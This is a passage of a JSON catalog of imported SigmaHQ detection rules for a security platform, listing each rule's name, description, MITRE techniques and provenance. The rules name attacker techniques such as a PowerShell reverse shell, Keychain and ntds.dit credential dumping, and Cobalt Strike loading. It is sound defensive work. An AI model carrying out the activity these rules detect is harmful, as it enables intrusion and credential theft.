engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" } }, { "id": "sigmahq-sigma-ae9d710f-dcd1-4f75-a0a5-93a73b5dda0e", "type": "detection", "name": "Launch Agent/Daemon Execution Via Launchctl", "description": "Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.001", "T1543.001", "T1543.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/launch-agent-daemon-execution-via-launchctl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ae9d710f-dcd1-4f75-a0a5-93a73b5dda0e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_launchctl_execution.yml" } }, { "id": "sigmahq-sigma-aeaef14c-e5bf-4690-a9c8-835caad458bd", "type": "detection", "name": "PIM Alert Setting Changes To Disabled", "description": "Detects when PIM alerts are set to disabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pim-alert-setting-changes-to-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aeaef14c-e5bf-4690-a9c8-835caad458bd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_pim_alerts_disabled.yml" } }, { "id": "sigmahq-sigma-aef9d1f1-7396-4e92-a927-4567c7a495c1", "type": "detection", "name": "Suspicious Git Clone", "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1593.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-git-clone.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aef9d1f1-7396-4e92-a927-4567c7a495c1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_git_susp_clone.yml" } }, { "id": "sigmahq-sigma-af1ac430-df6b-4b38-b976-0b52f07a0252", "type": "detection", "name": "OpenCanary - HTTP POST Login Attempt", "description": "Detects instances where an HTTP service on an OpenCanary node has had login attempt via Form POST.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-http-post-login-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "af1ac430-df6b-4b38-b976-0b52f07a0252", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_http_post_login_attempt.yml" } }, { "id": "sigmahq-sigma-af202fd3-7bff-4212-a25a-fb34606cfcbe", "type": "detection", "name": "Modifying Crontab", "description": "Detects suspicious modification of crontab file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/modifying-crontab.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "af202fd3-7bff-4212-a25a-fb34606cfcbe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/cron/lnx_cron_crontab_file_modification.yml" } }, { "id": "sigmahq-sigma-af491bca-e752-4b44-9c86-df5680533dbc", "type": "detection", "name": "Finger.EXE Execution", "description": "Detects execution of the \"finger.exe\" utility.\nFinger.EXE or \"TCPIP Finger Command\" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon.\nDue to the old nature of this utility and the rareness of machines having the finger service. Any execution of \"finger.exe\" can be considered \"suspicious\" and worth investigating.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/finger-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "af491bca-e752-4b44-9c86-df5680533dbc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_finger_execution.yml" } }, { "id": "sigmahq-sigma-af4c4609-5755-42fe-8075-4effb49f5d44", "type": "detection", "name": "Microsoft Excel Add-In Loaded From Uncommon Location", "description": "Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-excel-add-in-loaded-from-uncommon-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "af4c4609-5755-42fe-8075-4effb49f5d44", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_office_excel_xll_susp_load.yml" } }, { "id": "sigmahq-sigma-af4c87ce-bdda-4215-b998-15220772e993", "type": "detection", "name": "Suspicious Process Discovery With Get-Process", "description": "Get the processes that are running on the local computer.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1057" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-process-discovery-with-get-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "af4c87ce-bdda-4215-b998-15220772e993", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml" } }, { "id": "sigmahq-sigma-af5732ed-764e-489d-826d-0447c8b36242", "type": "detection", "name": "Windows MSIX Package Support Framework AI_STUBS Execution", "description": "Detects execution of Advanced Installer MSIX Package Support Framework (PSF) components, specifically AI_STUBS executables with original filename 'popupwrapper.exe'.\nThis activity may indicate malicious MSIX packages build with Advanced Installer leveraging the Package Support Framework to bypass application control restrictions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1553.005", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-msix-package-support-framework-ai-stubs-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "af5732ed-764e-489d-826d-0447c8b36242", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msix_ai_stub_execution.yml" } }, { "id": "sigmahq-sigma-af6925b0-8826-47f1-9324-337507a0babd", "type": "detection", "name": "Azure DNS Zone Modified or Deleted", "description": "Identifies when DNS zone is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1565.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-dns-zone-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "af6925b0-8826-47f1-9324-337507a0babd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_dns_zone_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-af6c3078-84cd-4c68-8842-08b76bd81b13", "type": "detection", "name": "OpenCanary - HTTP GET Request", "description": "Detects instances where an HTTP service on an OpenCanary node has received a GET request.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-http-get-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "af6c3078-84cd-4c68-8842-08b76bd81b13", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_http_get.yml" } }, { "id": "sigmahq-sigma-af77cf95-c469-471c-b6a0-946c685c4798", "type": "detection", "name": "Proxy Execution Via Wuauclt.EXE", "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/proxy-execution-via-wuauclt-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "af77cf95-c469-471c-b6a0-946c685c4798", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wuauclt_dll_loading.yml" } }, { "id": "sigmahq-sigma-afd12fed-b0ec-45c9-a13d-aa86625dac81", "type": "detection", "name": "Create Volume Shadow Copy with Powershell", "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/create-volume-shadow-copy-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml" } }, { "id": "sigmahq-sigma-afd3df04-948d-46f6-ae44-25966c44b97f", "type": "detection", "name": "PSAsyncShell - Asynchronous TCP Reverse Shell", "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psasyncshell-asynchronous-tcp-reverse-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "afd3df04-948d-46f6-ae44-25966c44b97f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml" } }, { "id": "sigmahq-sigma-afe52666-401e-4a02-b4ff-5d128990b8cb", "type": "detection", "name": "Suspicious Greedy Compression Using Rar.EXE", "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-greedy-compression-using-rar-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "afe52666-401e-4a02-b4ff-5d128990b8cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rar_susp_greedy_compression.yml" } }, { "id": "sigmahq-sigma-aff229ab-f8cd-447b-b215-084d11e79eb0", "type": "detection", "name": "Remote Schedule Task Lateral Movement via SASec", "description": "Detects remote RPC calls to create or execute a scheduled task via SASec", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053", "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-schedule-task-lateral-movement-via-sasec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aff229ab-f8cd-447b-b215-084d11e79eb0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" } }, { "id": "sigmahq-sigma-aff715fa-4dd5-497a-8db3-910bea555566", "type": "detection", "name": "DNS Query to External Service Interaction Domains", "description": "Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1595.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-external-service-interaction-domains.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aff715fa-4dd5-497a-8db3-910bea555566", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/dns/net_dns_external_service_interaction_domains.yml" } }, { "id": "sigmahq-sigma-aff815cc-e400-4bf0-a47a-5d8a2407d4e1", "type": "detection", "name": "Use Get-NetTCPConnection - PowerShell Module", "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-get-nettcpconnection-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml" } }, { "id": "sigmahq-sigma-b02f9591-12c3-4965-986a-88028629b2e1", "type": "detection", "name": "Azure Kubernetes Pods Deleted", "description": "Identifies the deletion of Azure Kubernetes Pods.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-kubernetes-pods-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b02f9591-12c3-4965-986a-88028629b2e1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_kubernetes_pods_deleted.yml" } }, { "id": "sigmahq-sigma-b04934b2-0a68-4845-8a19-bdfed3a68a7a", "type": "detection", "name": "App Assigned To Azure RBAC/Microsoft Entra Role", "description": "Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/app-assigned-to-azure-rbac-microsoft-entra-role.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b04934b2-0a68-4845-8a19-bdfed3a68a7a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_app_role_added.yml" } }, { "id": "sigmahq-sigma-b0524451-19af-4efa-a46f-562a977f792e", "type": "detection", "name": "ShimCache Flush", "description": "Detects actions that clear the local ShimCache and remove forensic evidence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/shimcache-flush.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b0524451-19af-4efa-a46f-562a977f792e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml" } }, { "id": "sigmahq-sigma-b056de1a-6e6e-4e40-a67e-97c9808cf41b", "type": "detection", "name": "AWS Route 53 Domain Transferred to Another Account", "description": "Detects when a request has been made to transfer a Route 53 domain to another AWS account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-route-53-domain-transferred-to-another-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b056de1a-6e6e-4e40-a67e-97c9808cf41b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml" } }, { "id": "sigmahq-sigma-b07e58cf-cacc-4135-8473-ccb2eba63dd2", "type": "detection", "name": "Potential Kerberos Coercion by Spoofing SPNs via DNS Manipulation", "description": "Detects modifications to DNS records in Active Directory where the Distinguished Name (DN) contains a base64-encoded blob\nmatching the pattern \"1UWhRCAAAAA...BAAAA\". This pattern corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure,\ncommonly used in Kerberos coercion attacks. Adversaries may exploit this to coerce victim systems into authenticating to\nattacker-controlled hosts by spoofing SPNs via DNS. It is one of the strong indicators of a Kerberos coercion attack,.\nwhere adversaries manipulate DNS records to spoof Service Principal Names (SPNs) and redirect authentication requests like CVE-2025-33073.\nPlease investigate the user account that made the changes, as it is likely a low-privileged account that has been compromised.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1557.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-kerberos-coercion-by-spoofing-spns-via-dns-manipulation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b07e58cf-cacc-4135-8473-ccb2eba63dd2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_kerberos_coercion_via_dns_object.yml" } }, { "id": "sigmahq-sigma-b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b", "type": "detection", "name": "Cisco Show Commands Input", "description": "See what commands are being input into the device by other people, full credentials can be in the history", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-show-commands-input.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_input_capture.yml" } }, { "id": "sigmahq-sigma-b0ce780f-10bd-496d-9067-066d23dc3aa5", "type": "detection", "name": "HackTool - SharpWSUS/WSUSpendu Execution", "description": "Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS.\nWindows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1210" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpwsus-wsuspendu-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b0ce780f-10bd-496d-9067-066d23dc3aa5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharpwsus_wsuspendu_execution.yml" } }, { "id": "sigmahq-sigma-b110ebaf-697f-4da1-afd5-b536fa27a2c1", "type": "detection", "name": "Potential Signing Bypass Via Windows Developer Features - Registry", "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-signing-bypass-via-windows-developer-features-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml" } }, { "id": "sigmahq-sigma-b120b587-a4c2-4b94-875d-99c9807d6955", "type": "detection", "name": "Credentials from Password Stores - Keychain", "description": "Detects passwords dumps from Keychain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/credentials-from-password-stores-keychain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b120b587-a4c2-4b94-875d-99c9807d6955", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" } }, { "id": "sigmahq-sigma-b124ddf4-778d-418e-907f-6dd3fc0d31cd", "type": "detection", "name": "Arbitrary File Download Via PresentationHost.EXE", "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-file-download-via-presentationhost-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_presentationhost_download.yml" } }, { "id": "sigmahq-sigma-b1377339-fda6-477a-b455-ac0923f9ec2c", "type": "detection", "name": "Remote Access Tool - AnyDesk Piped Password Via CLI", "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-anydesk-piped-password-via-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1377339-fda6-477a-b455-ac0923f9ec2c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml" } }, { "id": "sigmahq-sigma-b140afd9-474b-4072-958e-2ebb435abd68", "type": "detection", "name": "Suspicious Get-ADDBAccount Usage", "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-get-addbaccount-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b140afd9-474b-4072-958e-2ebb435abd68", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml" } }, { "id": "sigmahq-sigma-b17ea6f7-6e90-447e-a799-e6c0a493d6ce", "type": "detection", "name": "Shadow Copies Creation Using Operating Systems Utilities", 